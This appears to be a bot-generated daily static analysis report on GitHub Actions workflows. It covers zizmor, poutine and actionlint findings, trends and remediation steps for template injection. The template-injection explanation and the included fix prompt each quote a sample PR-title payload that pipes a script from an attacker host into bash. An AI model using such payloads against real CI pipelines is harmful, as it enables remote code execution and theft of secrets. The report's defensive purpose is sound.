Static Analysis Report - 2026-04-01

[github-actions[bot]]

Analysis Summary

Daily static analysis scan completed on 179 workflows using zizmor, poutine, and actionlint. Total findings increased by +39 from yesterday (8601 vs 8562), consistent with 1 new workflow being added.

• Tools Used: zizmor, poutine, actionlint
• Total Findings: 8,601
• Workflows Scanned: 179
• Workflows with Issues: 179 (virtually all affected)
• Compilation: 179/179 compiled successfully, 0 errors, 24 warnings

Findings by Tool

Tool	Total	Critical	High	Medium	Low	Informational/Note
zizmor (security)	3,992	0	30	3,863	20	79
poutine (supply chain)	19	0	0	2 (warning)	0	17 (note)
actionlint (linting)	4,590	—	—	—	—	—
Total	8,601

Clustered Findings by Tool and Type

Zizmor Security Findings

Issue Type	Severity	Count	Affected Workflows
secrets-outside-env	Medium	3,861	All 179
template-injection	High	24	24 workflows
template-injection	Informational	79	~45 workflows
unpinned-uses	High	5	1 (daily-fact)
github-env	High	1	1 (dev-hawk)
obfuscation	Low	20	~20 workflows
artipacked	Medium	1	1 workflow
secrets-inherit	Medium	1	1 workflow

Poutine Supply Chain Findings

Issue Type	Severity	Count	Affected Workflows
untrusted_checkout_exec	error	6	smoke-workflow-call, smoke-workflow-call-with-inputs
pr_runs_on_self_hosted	warning	2	dev, smoke-copilot-arm
github_action_from_unverified_creator_used	note	7	mcp-inspector, super-linter, link-check, copilot-setup-steps
unverified_script_exec	note	2	copilot-setup-steps
unpinnable_action	note	2	Various

Actionlint Linting Issues

Issue Type	Count	Description
shellcheck SC2086	4,309	Double quote to prevent globbing/word splitting
shellcheck SC2129	174	Use { cmd1; cmd2; } >> file instead of individual redirects
permissions	81	Unknown scope copilot-requests (not recognized by actionlint)
expression	13	activation.outputs.activated property not defined in object type
runner-label	12	Unknown runner label aw-gpu-runner-T4
shellcheck SC2012	1	Use find instead of ls

Top Priority Issues

1. Template Injection (High Severity) — Most Critical Security Risk

• Tool: zizmor
• Count: 24 High-severity instances across 24 workflows
• Severity: High
• Affected: audit-workflows, copilot-pr-nlp-analysis, copilot-session-insights, daily-code-metrics, daily-copilot-token-report, daily-firewall-report, daily-integrity-analysis, daily-issues-report, daily-multi-device-docs-tester, daily-news, daily-performance-summary, daily-repo-chronicle, deep-report, docs-noob-tester, github-mcp-structural-analysis, org-health-report, poem-bot, portfolio-analyst, python-data-charts, stale-repo-identifier, technical-doc-writer, unbloat-docs, weekly-editors-health-check, weekly-issue-summary
• Description: GitHub Actions expressions ($\{\{ github.event.issue.title }}, $\{\{ github.head_ref }}, etc.) are directly interpolated into run: shell scripts, enabling arbitrary command injection if an attacker crafts a malicious PR/issue title or comment.
• Impact: An attacker can execute arbitrary shell code in the CI/CD environment by submitting a PR or issue with a crafted title like "; curl attacker.com/pwn.sh | bash; ". This can exfiltrate secrets, modify code, or pivot to other systems.
• Reference: (docs.zizmor.sh/redacted)

2. Secrets Outside Environment (Medium — Widespread)

• Tool: zizmor
• Count: 3,861 across all 179 workflows
• Severity: Medium
• Description: Secrets are referenced directly in workflow steps (e.g., $\{\{ secrets.TOKEN }}) without using a dedicated env: block, making them vulnerable to log leakage or injection.
• Reference: (docs.zizmor.sh/redacted)

3. Unknown Permission Scope copilot-requests

• Tool: actionlint
• Count: 81 across many workflows
• Description: Workflows use copilot-requests: write permission scope which actionlint does not recognize. This is likely a custom/newer permission not yet in actionlint's schema. Not a critical issue but generates noise.

Fix Suggestion for Template Injection (Highest Priority)

Issue: Direct interpolation of user-controlled GitHub Actions expressions into shell run: scripts
Severity: High
Affected Workflows: 24 workflows with High-severity instances

Prompt to Copilot Agent:

You are fixing a security vulnerability identified by zizmor in GitHub Actions workflows.

**Vulnerability**: Template Injection (template-injection)
**Severity**: High
**Rule Reference**: (docs.zizmor.sh/redacted)

**What's Wrong**:
GitHub Actions expressions like `$\{\{ github.event.issue.title }}`,
`$\{\{ github.event.pull_request.title }}`, `$\{\{ github.event.comment.body }}`,
`$\{\{ github.head_ref }}`, `$\{\{ github.event.discussion.title }}`, etc.
are being directly interpolated into `run:` scripts. Since these values
come from untrusted user input, an attacker can inject shell commands by
crafting a PR/issue with a title like:
  `"; curl attacker.com/shell.sh | bash; echo "`

**Required Fix**:
Move the expression value into an environment variable in the step's `env:` block,
then reference the env var (prefixed with `$`) in the shell script.
Environment variables are passed out-of-band and are NOT subject to template injection.

**Step-by-step**:
1. Identify all `run:` steps that directly embed `$\{\{ github.event.* }}`,
   `$\{\{ github.head_ref }}`, or other user-controlled expressions.
2. Add an `env:` block to the step with a descriptive variable name.
3. Replace the inline `$\{\{ ... }}` expression in the shell code with `$VAR_NAME`.
4. Ensure the variable is quoted in shell: `"$VAR_NAME"`.

**Example**:

Before (vulnerable):
```yaml
- name: Process issue
  run: |
    echo "Issue: $\{\{ github.event.issue.title }}"
    gh issue comment $\{\{ github.event.issue.number }} --body "processed"

After (fixed):

- name: Process issue
  env:
    ISSUE_TITLE: $\{\{ github.event.issue.title }}
    ISSUE_NUMBER: $\{\{ github.event.issue.number }}
  run: |
    echo "Issue: $ISSUE_TITLE"
    gh issue comment "$ISSUE_NUMBER" --body "processed"

Common untrusted expressions to look for:

• $\{\{ github.event.issue.title }} / $\{\{ github.event.issue.body }}
• $\{\{ github.event.pull_request.title }} / $\{\{ github.event.pull_request.body }}
• $\{\{ github.event.comment.body }}
• $\{\{ github.head_ref }}
• $\{\{ github.event.discussion.title }} / $\{\{ github.event.discussion.body }}
• $\{\{ github.event.review.body }}

Apply this fix to all 24 affected workflows: audit-workflows, copilot-pr-nlp-analysis,
copilot-session-insights, daily-code-metrics, daily-copilot-token-report,
daily-firewall-report, daily-integrity-analysis, daily-issues-report,
daily-multi-device-docs-tester, daily-news, daily-performance-summary,
daily-repo-chronicle, deep-report, docs-noob-tester, github-mcp-structural-analysis,
org-health-report, poem-bot, portfolio-analyst, python-data-charts,
stale-repo-identifier, technical-doc-writer, unbloat-docs,
weekly-editors-health-check, weekly-issue-summary.

<details>
<summary><b>Detailed Findings by Category</b></summary>

#### Zizmor: `github-env` (High)

- **Workflow**: `dev-hawk`
- **Description**: Dangerous use of `GITHUB_ENV` environment file — writing to `$GITHUB_ENV` from an untrusted context can allow environment variable injection that persists across steps.
- **Reference**: (docs.zizmor.sh/redacted)

#### Zizmor: `unpinned-uses` (High)

- **Workflow**: `daily-fact`
- **Count**: 5 findings
- **Description**: Action references not pinned to a full commit SHA. Unpinned actions can be silently updated by their authors to include malicious code.
- **Reference**: (docs.zizmor.sh/redacted)

#### Poutine: `untrusted_checkout_exec` (error)

- **Workflows**: `smoke-workflow-call`, `smoke-workflow-call-with-inputs`
- **Count**: 6 (most suppressed with `# poutine:ignore`)
- **Description**: Bash scripts run after a checkout of untrusted code (PR branch). If the checked-out code contains malicious scripts, executing bash from `$RUNNER_TEMP` after checkout may execute them.
- **Note**: These appear to be accepted false positives (existing `poutine:ignore` comments in place).

#### Actionlint: `expression` (Property undefined)

- **Pattern**: `needs.activation.outputs.activated` used in `if:` conditions but `activated` is not defined in the `activation` job's outputs schema.
- **Count**: 13
- **Affected workflows**: ace-editor and others using activation job pattern
- **Impact**: Workflow logic may silently evaluate to false, skipping steps.

#### Compilation Warnings

- 3 workflows using experimental `rate-limit` feature
- 4 workflows using experimental `qmd` feature  
- 1 workflow: `smoke-call-workflow` — `push-to-pull-request-branch: target: "*"` without fetch wildcard or label/title constraints
- 1 workflow: using `web-search` tool with `copilot` engine (unsupported)
- Schedule warnings: 7 workflows using fixed schedule times (recommend fuzzy schedules)
- 1 workflow: recommend using ecosystem identifiers (`go`) instead of individual domain names

</details>

### Historical Trends

| Date | Total | Zizmor | Poutine | Actionlint | Workflows |
|------|-------|--------|---------|------------|-----------|
| 2026-03-29 | 7,383 | 3,455 | 6 | 3,928 | 157/178 compiled |
| 2026-03-30 | 8,520 | 3,953 | 6 | 4,561 | 178/178 |
| 2026-03-31 | 8,562 | 3,977 | 19 | 4,566 | 178/178 |
| **2026-04-01** | **8,601** | **3,992** | **19** | **4,590** | **179/179** |

- **Change from yesterday**: +39 (+0.5%) — consistent with 1 new workflow added
- **7-day trend**: Steady growth driven by new workflows being added
- **template-injection (High)**: Stable at 24 High-severity instances — no new injections, no fixes yet
- **secrets-outside-env**: +14 from yesterday (3847→3861) — new workflow follows same pattern
- **poutine**: Stable at 19 since 2026-03-31 (increased from 6 when poutine scan improved)
- **actionlint SC2086**: Gradual increase tracking workflow additions (+23 from yesterday)

#### New Issues (since 2026-03-30)

- `template-injection` Informational instances increased significantly (49→79) — more context-dependent cases flagged

#### Persistent Issues (no change in 4 days)

- `template-injection` High: stable at 24 — needs fix
- `github-env`: stable at 1 — needs fix in `dev-hawk`
- `unpinned-uses`: stable at 5 — needs fix in `daily-fact`

### Recommendations

1. **Immediate**: Fix 24 High-severity `template-injection` vulnerabilities using the Copilot agent prompt above. These are real security risks enabling RCE.
2. **Immediate**: Fix `github-env` issue in `dev-hawk` workflow.
3. **Short-term**: Pin all actions in `daily-fact` to full commit SHAs to address `unpinned-uses`.
4. **Short-term**: Fix `activation.outputs.activated` expression type error (13 occurrences) to prevent silent step-skipping.
5. **Long-term**: Address `secrets-outside-env` (3,861 instances) — migrate secrets to `env:` blocks. This is a large-scale refactor best done via automated tooling.
6. **Long-term**: Fix SC2086 shellcheck warnings (4,309 instances) by quoting `\$\{RUNNER_TEMP}` references throughout generated lock files.
7. **Prevention**: Update workflow templates to use `env:` blocks for all secret and user-input references by default.

### Next Steps

- [ ] Apply template-injection fix prompt to the 24 affected workflows
- [ ] Fix `github-env` in dev-hawk
- [ ] Pin actions in daily-fact to SHA
- [ ] Investigate `activation.outputs.activated` expression errors
- [ ] Consider adding `zizmor --min-severity high` check to PR CI
- [ ] Update workflow generation templates to avoid `secrets-outside-env` pattern

**References:**
- [Workflow Run §23867545266](https://github.com/github/gh-aw/actions/runs/23867545266)
- [zizmor template-injection docs]((docs.zizmor.sh/redacted)
- [actionlint SC2086 docs](https://github.com/rhysd/actionlint/blob/main/docs/checks.md#check-shellcheck-integ)


> AI generated by [Static Analysis Report](https://github.com/github/gh-aw/actions/runs/23867545266) · [history](https://github.com/search?q=repo%3Agithub%2Fgh-aw+%22gh-aw-workflow-call-id%3A+github%2Fgh-aw%2Fstatic-analysis-report%22&type=discussions)
> - [x] expires <!-- gh-aw-expires: 2026-04-02T19:53:39.491Z --> on Apr 2, 2026, 7:53 PM UTC

<!-- gh-aw-workflow-id: static-analysis-report -->
<!-- gh-aw-workflow-call-id: github/gh-aw/static-analysis-report -->

[github-actions[bot]]

This discussion has been marked as outdated by Static Analysis Report.

A newer discussion is available at Discussion #24166.